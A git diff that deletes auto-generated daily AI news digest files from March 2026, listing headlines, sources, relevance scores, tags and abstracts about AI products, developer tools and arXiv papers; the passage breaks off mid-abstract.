a/data/digest-2026-03-18.md b/data/digest-2026-03-18.md deleted file mode 100644 index b931e5a..0000000 --- a/data/digest-2026-03-18.md +++ /dev/null @@ -1,71 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-18** | 10 stories | Auto-generated from 90 archived stories - ---- - -## [The leaderboard “you can’t game,” funded by the companies it ranks](https://techcrunch.com/video/the-leaderboard-you-cant-game-funded-by-the-companies-it-ranks/) -*TechCrunch AI* | 18/03/2026 | Score: 1.00 -Tags: product_launch - -> Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […] - ---- - -## [The PhD students who became the judges of the AI industry](https://techcrunch.com/podcast/the-phd-students-who-became-the-judges-of-the-ai-industry/) -*TechCrunch AI* | 18/03/2026 | Score: 1.00 -Tags: product_launch - -> Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […] - ---- - -## [Meta is having trouble with rogue AI agents](https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/) -*TechCrunch AI* | 18/03/2026 | Score: 0.99 -Tags: agent_tool - -> A rogue AI agent inadvertently exposed Meta company and user data to engineers who didn't have permission to see it. - ---- - -## [Launch an autonomous AI agent with sandboxed execution in 2 lines of code](https://amaiya.github.io/onprem/examples_agent.html) -*Hacker News* | 18/03/2026 | Score: 0.98 -Tags: agent_tool - ---- - -## [Nightingale – open-source karaoke app that works with any song on your computer](https://nightingale.cafe/) -*Hacker News* | 18/03/2026 | Score: 0.76 -Tags: open_source - ---- - -## [A ngrok-style secure tunnel server written in Rust and Open Source](https://github.com/joaoh82/rustunnel) -*Hacker News* | 18/03/2026 | Score: 0.71 -Tags: open_source - ---- - -## [Show HN: Tmux-IDE, OSS agent-first terminal IDE](https://tmux.thijsverreck.com) -*Hacker News* | 18/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: Pgit – A Git-like CLI backed by PostgreSQL](https://oseifert.ch/blog/building-pgit) -*Hacker News* | 17/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m](https://huggingface.co/datasets/open-index/hacker-news) -*Hacker News* | 14/03/2026 | Score: 0.70 -Tags: tool_update - ---- - -## [Measuring progress toward AGI: A cognitive framework](https://blog.google/innovation-and-ai/models-and-research/google-deepmind/measuring-agi-cognitive-framework/) -*Hacker News* | 18/03/2026 | Score: 0.61 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-03-19.md b/data/digest-2026-03-19.md deleted file mode 100644 index 4b8563a..0000000 --- a/data/digest-2026-03-19.md +++ /dev/null @@ -1,39 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-19** | 5 stories | Auto-generated from 98 archived stories - ---- - -## [Multiverse Computing pushes its compressed AI models into the mainstream](https://techcrunch.com/2026/03/19/multiverse-computing-pushes-its-compressed-ai-models-into-the-mainstream/) -*TechCrunch AI* | 19/03/2026 | Score: 1.00 -Tags: api_update, tool_update - -> After compressing models from major AI labs, including OpenAI, Meta, DeepSeek, and Mistral AI, Multiverse Computing has launched both an app that showcases the capabilities of its compressed models and an API that makes them more widely available. - ---- - -## [DoorDash launches a new ‘Tasks’ app that pays couriers to submit videos to train AI](https://techcrunch.com/2026/03/19/doordash-launches-a-new-tasks-app-that-pays-couriers-to-submit-videos-to-train-ai/) -*TechCrunch AI* | 19/03/2026 | Score: 0.91 -Tags: product_launch - -> Delivery couriers will be able to earn money by completing activities like filming everyday tasks or recording themselves speaking in another language. - ---- - -## [Hyper-optimized reverse geocoding API](https://github.com/traccar/traccar-geocoder) -*Hacker News* | 19/03/2026 | Score: 0.76 -Tags: api_update - ---- - -## [Framework doesn't matter](https://cemrehancavdar.com/2026/02/19/your-framework-may-not-matter/) -*Hacker News* | 14/03/2026 | Score: 0.76 -Tags: developer_tool - ---- - -## [Cook: A simple CLI for orchestrating Claude Code](https://rjcorwin.github.io/cook/) -*Hacker News* | 19/03/2026 | Score: 0.65 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-20.md b/data/digest-2026-03-20.md deleted file mode 100644 index 1330ddd..0000000 --- a/data/digest-2026-03-20.md +++ /dev/null @@ -1,45 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-20** | 6 stories | Auto-generated from 82 archived stories - ---- - -## [OpenCode – Open source AI coding agent](https://opencode.ai/) -*Hacker News* | 20/03/2026 | Score: 0.76 -Tags: open_source, agent_tool - ---- - -## [My AI Agent ‘Cofounder’ Conquered LinkedIn. Then It Got Banned](https://www.wired.com/story/linkedin-invited-my-ai-cofounder-to-give-a-corporate-talk-then-banned-it/) -*Wired AI* | 20/03/2026 | Score: 1.00 -Tags: agent_tool - -> When social media is constantly pushing people to use AI, why not let AI agents participate? - ---- - -## [Trump’s AI framework targets state laws, shifts child safety burden to parents](https://techcrunch.com/2026/03/20/trumps-ai-framework-targets-state-laws-shifts-child-safety-burden-to-parents/) -*TechCrunch AI* | 20/03/2026 | Score: 0.91 -Tags: developer_tool - -> Trump’s AI framework pushes federal preemption of state laws, emphasizes innovation, and shifts responsibility for child safety toward parents while laying out lighter-touch rules for tech companies. - ---- - -## [Show HN: We built a terminal-only Bluesky / AT Proto client written in Fortran](https://github.com/FormerLab/fortransky) -*Hacker News* | 20/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: Sonar – A tiny CLI to see and kill whatever's running on localhost](https://github.com/RasKrebs/sonar) -*Hacker News* | 20/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: An open-source safety net for home hemodialysis](https://safehemo.com/) -*Hacker News* | 17/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-21.md b/data/digest-2026-03-21.md deleted file mode 100644 index 3e8826b..0000000 --- a/data/digest-2026-03-21.md +++ /dev/null @@ -1,49 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-21** | 7 stories | Auto-generated from 80 archived stories - ---- - -## [Apple Announces New Mac Sales Record Following MacBook Neo Launch](https://www.macrumors.com/2026/03/20/apple-shares-mac-sales-achievement/) -*Hacker News* | 21/03/2026 | Score: 0.90 -Tags: product_launch - ---- - -## [Mamba-3](https://www.together.ai/blog/mamba-3) -*Hacker News* | 17/03/2026 | Score: 0.87 -Tags: open_source - -> Meet Mamba-3: the SSM built for inference. Faster than Transformers at decode, stronger than Mamba-2, and open-source from day one. - ---- - -## [Iran launched unsuccessful attack on UK's Diego Garcia](https://www.bbc.com/news/articles/c5yljdgwppzo) -*Hacker News* | 21/03/2026 | Score: 0.84 -Tags: tool_update - ---- - -## [Show HN: Termcraft – terminal-first 2D sandbox survival in Rust](https://github.com/pagel-s/termcraft) -*Hacker News* | 21/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Atuin v18.13 – better search, a PTY proxy, and AI for your shell](https://blog.atuin.sh/atuin-v18-13/) -*Hacker News* | 21/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [purl: a curl-esque CLI for making HTTP requests that require payment](https://www.purl.dev/) -*Hacker News* | 21/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Floci – A free, open-source local AWS emulator](https://github.com/hectorvent/floci) -*Hacker News* | 21/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-22.md b/data/digest-2026-03-22.md deleted file mode 100644 index c0ab7c7..0000000 --- a/data/digest-2026-03-22.md +++ /dev/null @@ -1,49 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-22** | 7 stories | Auto-generated from 88 archived stories - ---- - -## [Elon Musk unveils chip manufacturing plans for SpaceX and Tesla](https://techcrunch.com/2026/03/22/elon-musk-unveils-chip-manufacturing-plans-for-spacex-and-tesla/) -*TechCrunch AI* | 22/03/2026 | Score: 1.00 -Tags: product_launch - -> Elon Musk recently outlined ambitious plans for a chip-building collaboration Tesla and SpaceX — but he has a history of overpromising. - ---- - -## [Show HN: A Markdown file that turns your AI agent into an autonomous researcher](https://github.com/krzysztofdudek/ResearcherSkill) -*Hacker News* | 22/03/2026 | Score: 0.92 -Tags: agent_tool - ---- - -## [HopTab–free,open source macOS app switcher and tiler that replaces Cmd+Tab](https://www.royalbhati.com/hoptab) -*Hacker News* | 22/03/2026 | Score: 0.76 -Tags: open_source - ---- - -## [Training Center for Maneuvering on Manned Model Ships](https://www.portrevel.com/) -*Hacker News* | 20/03/2026 | Score: 0.76 -Tags: tool_update - ---- - -## [$ teebot.dev – from terminal to tee in 6 seconds](https://teebot.dev) -*Hacker News* | 22/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [How to Attract AI Bots to Your Open Source Project](https://nesbitt.io/2026/03/21/how-to-attract-ai-bots-to-your-open-source-project.html) -*Hacker News* | 21/03/2026 | Score: 0.68 -Tags: open_source - ---- - -## [Node.js worker threads are problematic, but they work great for us](https://www.inngest.com/blog/node-worker-threads) -*Hacker News* | 18/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-23.md b/data/digest-2026-03-23.md deleted file mode 100644 index cf1d945..0000000 --- a/data/digest-2026-03-23.md +++ /dev/null @@ -1,25 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-23** | 3 stories | Auto-generated from 82 archived stories - ---- - -## [The Download: animal welfare gets AGI-pilled, and the White House unveils its AI policy](https://www.technologyreview.com/2026/03/23/1134509/the-download-animal-welfare-agi-pilled-white-house-unveils-ai-policy/) -*MIT Tech Review AI* | 23/03/2026 | Score: 0.88 -Tags: product_launch - -> This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. The Bay Area’s animal welfare movement wants to recruit AI  In early February, animal welfare advocates and AI researchers arrived in stocking feet at Mox, a scrappy, shoes-free coworking space in… - ---- - -## [Show HN: Agent Kernel – Three Markdown files that make any AI agent stateful](https://github.com/oguzbilgic/agent-kernel) -*Hacker News* | 23/03/2026 | Score: 0.78 -Tags: agent_tool - ---- - -## [The way CTRL-C in Postgres CLI cancels queries is incredibly hack-y](https://neon.com/blog/ctrl-c-in-psql-gives-me-the-heebie-jeebies) -*Hacker News* | 20/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-24.md b/data/digest-2026-03-24.md deleted file mode 100644 index 5f3535c..0000000 --- a/data/digest-2026-03-24.md +++ /dev/null @@ -1,65 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-24** | 9 stories | Auto-generated from 101 archived stories - ---- - -## [Google TV’s new Gemini features keep fans updated on sports teams and more](https://techcrunch.com/2026/03/24/google-tv-new-gemini-features-keep-fans-updated-on-sports-teams-deep-dives-visual-answers/) -*TechCrunch AI* | 24/03/2026 | Score: 1.00 -Tags: tool_update - -> Three Gemini-powered features are coming to your Google TV. This includes visual responses, deep dives, and sports briefs. - ---- - -## [OpenAI adds open source tools to help developers build for teen safety](https://techcrunch.com/2026/03/24/openai-adds-open-source-tools-to-help-developers-build-for-teen-safety/) -*TechCrunch AI* | 24/03/2026 | Score: 0.94 -Tags: open_source - -> Rather than working from scratch to figure out how to make AI safer for teens, developers can use these policies to fortify what they build. - ---- - -## [Sunsetting the Techempower Framework Benchmarks](https://github.com/TechEmpower/FrameworkBenchmarks/issues/10932) -*Hacker News* | 24/03/2026 | Score: 0.82 -Tags: developer_tool - ---- - -## [Self-propagating malware poisons open source software and wipes Iran-based machines](https://arstechnica.com/security/2026/03/self-propagating-malware-poisons-open-source-software-and-wipes-iran-based-machines/) -*Ars Technica AI* | 24/03/2026 | Score: 0.76 -Tags: open_source - -> Development houses: It's time to check your networks for infections. - ---- - -## [Qite.js – Frontend framework for people who hate React and love HTML](https://qitejs.qount25.dev) -*Hacker News* | 19/03/2026 | Score: 0.76 -Tags: developer_tool - ---- - -## [Nanobrew: The fastest macOS package manager compatible with brew](https://nanobrew.trilok.ai/) -*Hacker News* | 24/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - -## [A retro terminal music player inspired by Winamp](https://github.com/bjarneo/cliamp) -*Hacker News* | 23/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: Gridland: make terminal apps that also run in the browser](https://www.gridland.io/) -*Hacker News* | 24/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - -## [Log File Viewer for the Terminal](https://lnav.org/) -*Hacker News* | 24/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-25.md b/data/digest-2026-03-25.md deleted file mode 100644 index e80cc8d..0000000 --- a/data/digest-2026-03-25.md +++ /dev/null @@ -1,53 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-25** | 7 stories | Auto-generated from 95 archived stories - ---- - -## [Google launches Lyria 3 Pro music generation model](https://techcrunch.com/2026/03/25/google-launches-lyria-3-pro-music-generation-model/) -*TechCrunch AI* | 25/03/2026 | Score: 1.00 -Tags: product_launch - -> Google is launching Lyria 3 Pro, an upgraded music model that generates longer, more customizable tracks, as it expands AI music tools across Gemini, enterprise products, and other services. - ---- - -## [Meta launches new initiative to support entrepreneurship, drive AI adoption](https://techcrunch.com/2026/03/25/meta-launches-new-initiative-to-support-entrepreneurship-drive-ai-adoption/) -*TechCrunch AI* | 25/03/2026 | Score: 1.00 -Tags: product_launch - -> Meta CEO Mark Zuckerberg said in a memo to staff that small businesses have always been a big part of the company's business model, and that while tens of millions of entrepreneurs already use its platforms to grow and connect with customers, the company wants to do more in the space. - ---- - -## [Google unveils TurboQuant, a new AI memory compression algorithm — and yes, the internet is calling it ‘Pied Piper’](https://techcrunch.com/2026/03/25/google-turboquant-ai-memory-compression-silicon-valley-pied-piper/) -*TechCrunch AI* | 25/03/2026 | Score: 0.77 -Tags: product_launch - -> Google’s TurboQuant has the internet joking about Pied Piper from HBO's "Silicon Valley." The compression algorithm promises to shrink AI’s “working memory” by up to 6x, but it’s still just a lab experiment for now. - ---- - -## [Building a coding agent in Swift from scratch](https://github.com/ivan-magda/swift-claude-code) -*Hacker News* | 25/03/2026 | Score: 0.70 -Tags: agent_tool - ---- - -## [Show HN: DuckDB community extension for prefiltered HNSW using ACORN-1](https://github.com/cigrainger/duckdb-hnsw-acorn) -*Hacker News* | 25/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - -## [Rendering complex scripts in terminal and OSC 66](https://thottingal.in/blog/2026/03/22/complex-scripts-in-terminal/) -*Hacker News* | 22/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Open source isn't a tip jar – it's time to charge for access](https://www.theregister.com/2026/03/25/open_source_bill_opinion/) -*Hacker News* | 25/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-26.md b/data/digest-2026-03-26.md deleted file mode 100644 index f46f6ad..0000000 --- a/data/digest-2026-03-26.md +++ /dev/null @@ -1,51 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-26** | 7 stories | Auto-generated from 95 archived stories - ---- - -## [Cohere launches an open source voice model specifically for transcription](https://techcrunch.com/2026/03/26/cohere-launches-an-open-source-voice-model-specifically-for-transcription/) -*TechCrunch AI* | 26/03/2026 | Score: 1.00 -Tags: product_launch, open_source - -> Relatively light at just 2 billion parameters, the model is meant for use with consumer-grade GPUs for those who want to self-host it. It currently supports 14 languages. - ---- - -## [Mistral releases a new open source model for speech generation](https://techcrunch.com/2026/03/26/mistral-releases-a-new-open-source-model-for-speech-generation/) -*TechCrunch AI* | 26/03/2026 | Score: 1.00 -Tags: product_launch, open_source - -> The model, which lets enterprises build voice agents for sales and customer engagement, puts Mistral in direct competition with the likes of ElevenLabs, Deepgram, and OpenAI. - ---- - -## [Intel Announces Arc Pro B70 and Arc Pro B65 GPUs](https://www.techpowerup.com/347703/intel-announces-arc-pro-b70-and-arc-pro-b65-gpus-maxes-out-xe2-battlemage-architecture) -*Hacker News* | 26/03/2026 | Score: 0.92 -Tags: product_launch - ---- - -## [Show HN: I put an AI agent on a $7/month VPS with IRC as its transport layer](https://georgelarson.me/writing/2026-03-23-nullclaw-doorman/) -*Hacker News* | 26/03/2026 | Score: 0.78 -Tags: agent_tool - ---- - -## [Show HN: Relay – The open-source Claude Cowork for OpenClaw](https://github.com/SeventeenLabs/relay) -*Hacker News* | 26/03/2026 | Score: 0.71 -Tags: open_source - ---- - -## [Stripe Projects: Provision and manage services from the CLI](https://projects.dev/) -*Hacker News* | 26/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Shell Tricks That Make Life Easier (and Save Your Sanity)](https://blog.hofstede.it/shell-tricks-that-actually-make-life-easier-and-save-your-sanity/) -*Hacker News* | 26/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-27.md b/data/digest-2026-03-27.md deleted file mode 100644 index 5d784c5..0000000 --- a/data/digest-2026-03-27.md +++ /dev/null @@ -1,35 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-27** | 5 stories | Auto-generated from 86 archived stories - ---- - -## [Nashville library launches Memory Lab for digitizing home movies](https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies) -*Hacker News* | 24/03/2026 | Score: 0.84 -Tags: product_launch, developer_tool - ---- - -## [Show HN: Open-Source Animal Crossing–Style UI for Claude Code Agents](https://github.com/outworked/outworked/releases/tag/v0.3.0) -*Hacker News* | 27/03/2026 | Score: 0.77 -Tags: open_source - ---- - -## [Telnyx package compromised on PyPI](https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm) -*Hacker News* | 27/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - -## [Telnyx package compromised on PyPI](https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026) -*Hacker News* | 27/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - -## [Show HN: Minimalist library to generate SVG views of scientific data](https://github.com/alefore/mini_svg/) -*Hacker News* | 23/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-03-28.md b/data/digest-2026-03-28.md deleted file mode 100644 index 42faafe..0000000 --- a/data/digest-2026-03-28.md +++ /dev/null @@ -1,29 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-28** | 4 stories | Auto-generated from 67 archived stories - ---- - -## [Arm releases first in-house chip, with Meta as debut customer](https://www.cnbc.com/2026/03/24/arm-launches-its-own-cpu-with-meta-as-first-customer.html) -*Hacker News* | 24/03/2026 | Score: 0.92 -Tags: product_launch - ---- - -## [Improving personal tax filing with Claude CLI and Obsidian](https://www.mrafayaleem.com/blog/improving-personal-tax-filing-with-claude-obsidian) -*Hacker News* | 28/03/2026 | Score: 0.73 -Tags: cli_tool - ---- - -## [Improved Git Diffs with Delta, Fzf and a Little Shell Scripting](https://nickjanetakis.com/blog/awesome-git-diffs-with-delta-fzf-and-a-little-shell-scripting) -*Hacker News* | 24/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [OpenCiv1 – open-source rewrite of Civ1](https://github.com/rajko-horvat/OpenCiv1) -*Hacker News* | 28/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-29.md b/data/digest-2026-03-29.md deleted file mode 100644 index 4e410a6..0000000 --- a/data/digest-2026-03-29.md +++ /dev/null @@ -1,23 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-29** | 3 stories | Auto-generated from 57 archived stories - ---- - -## [Figma's MCP Update Reflects a Larger Industry Shift](https://metedata.substack.com/p/a-small-figma-update-and-a-big-signal) -*Hacker News* | 29/03/2026 | Score: 0.82 -Tags: mcp - ---- - -## [OpenYak – An open-source Cowork that runs any model and owns your filesystem](https://github.com/openyak/desktop) -*Hacker News* | 29/03/2026 | Score: 0.82 -Tags: open_source - ---- - -## [Pretext: TypeScript library for multiline text measurement and layout](https://github.com/chenglou/pretext) -*Hacker News* | 28/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-03-30.md b/data/digest-2026-03-30.md deleted file mode 100644 index 545fc5d..0000000 --- a/data/digest-2026-03-30.md +++ /dev/null @@ -1,19 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-30** | 2 stories | Auto-generated from 75 archived stories - ---- - -## [There are more AI health tools than ever—but how well do they work?](https://www.technologyreview.com/2026/03/30/1134795/there-are-more-ai-health-tools-than-ever-but-how-well-do-they-work/) -*MIT Tech Review AI* | 30/03/2026 | Score: 0.91 -Tags: tool_update - -> Earlier this month, Microsoft launched Copilot Health, a new space within its Copilot app where users will be able to connect their medical records and ask specific questions about their health. A couple of days earlier, Amazon had announced that Health AI, an LLM-based tool previously restricted to members of its One Medical service, would… - ---- - -## [Build123d: A Python CAD programming library](https://github.com/gumyr/build123d) -*Hacker News* | 29/03/2026 | Score: 0.49 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-03-31.md b/data/digest-2026-03-31.md deleted file mode 100644 index 57b1dec..0000000 --- a/data/digest-2026-03-31.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-31** | 15 stories | Auto-generated from 533 archived stories - ---- - -## [A Regression Framework for Understanding Prompt Component Impact on LLM Performance](https://arxiv.org/abs/2603.26830) -*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 -Tags: open_source, developer_tool, tool_update - -> arXiv:2603.26830v1 Announce Type: new Abstract: As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task. - ---- - -## [LangChain Announces Enterprise Agentic AI Platform Built with NVIDIA](https://blog.langchain.com/nvidia-enterprise/) -*LangChain Blog* | 16/03/2026 | Score: 1.00 -Tags: product_launch, open_source, tool_update - -> Comprehensive agent engineering platform combined with NVIDIA AI enables enterprises to build, deploy, and monitor production-grade AI agents at scale Press Release SAN FRANCISCO, March 16, 2026 /PRNewswire/ — LangChain, the agent engineering company behind LangSmith and open-source frameworks that have surpassed 1 billion downloads, today announced a comprehensive integration - ---- - -## [Systematic debugging for AI agents: Introducing the AgentRx framework](https://www.microsoft.com/en-us/research/blog/systematic-debugging-for-ai-agents-introducing-the-agentrx-framework/) -*Microsoft Research Blog* | 12/03/2026 | Score: 1.00 -Tags: api_update, developer_tool, agent_tool - -> As AI agents transition from simple chatbots to autonomous systems capable of managing cloud incidents, navigating complex web interfaces, and executing multi-step API workflows, a new challenge has emerged: transparency. When a human makes a mistake, we can usually trace the logic. But when an AI agent fails, perhaps by hallucinating a tool output or […] The post Systematic debugging for AI agents: Introducing the AgentRx framework appeared first on Microsoft Research . - ---- - -## [Autonomous context compression](https://blog.langchain.com/autonomous-context-compression/) -*LangChain Blog* | 11/03/2026 | Score: 0.86 -Tags: api_update, developer_tool, cli_tool - -> TL;DR: We've added a tool to the Deep Agents SDK (Python) and CLI that allows models to compress their own context windows at opportune times. Motivation Context compression is an action that reduces the information in an agent’s working memory. Older messages are replaced by - ---- - -## [Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals](https://arxiv.org/abs/2603.26829) -*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 -Tags: product_launch, developer_tool - -> arXiv:2603.26829v1 Announce Type: new Abstract: Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (S&R), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p<10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design. - ---- - -## [A Step Toward Federated Pretraining of Multimodal Large Language Models](https://arxiv.org/abs/2603.26786) -*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 -Tags: product_launch, developer_tool - -> arXiv:2603.26786v1 Announce Type: new Abstract: The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines. - ---- - -## [TED: Training-Free Experience Distillation for Multimodal Reasoning](https://arxiv.org/abs/2603.26778) -*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 -Tags: developer_tool, tool_update - -> arXiv:2603.26778v1 Announce Type: new Abstract: Knowledge distillation is typically realized by transferring a teacher model's knowledge into a student's parameters through supervised or reinforcement-based optimization. While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student's prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience. - ---- - -## [EpochX: Building the Infrastructure for an Emergent Agent Civilization](https://arxiv.org/abs/2603.27304) -*ArXiv cs.AI* | 31/03/2026 | Score: 1.00 -Tags: api_update, product_launch - -> arXiv:2603.27304v1 Announce Type: new Abstract: General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration. - ---- - -## [Bitboard version of Tetris AI](https://arxiv.org/abs/2603.26765) -*ArXiv cs.AI* | 31/03/2026 | Score: 1.00 -Tags: developer_tool, tool_update - -> arXiv:2603.26765v1 Announce Type: new Abstract: The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. Additionally, we develop a 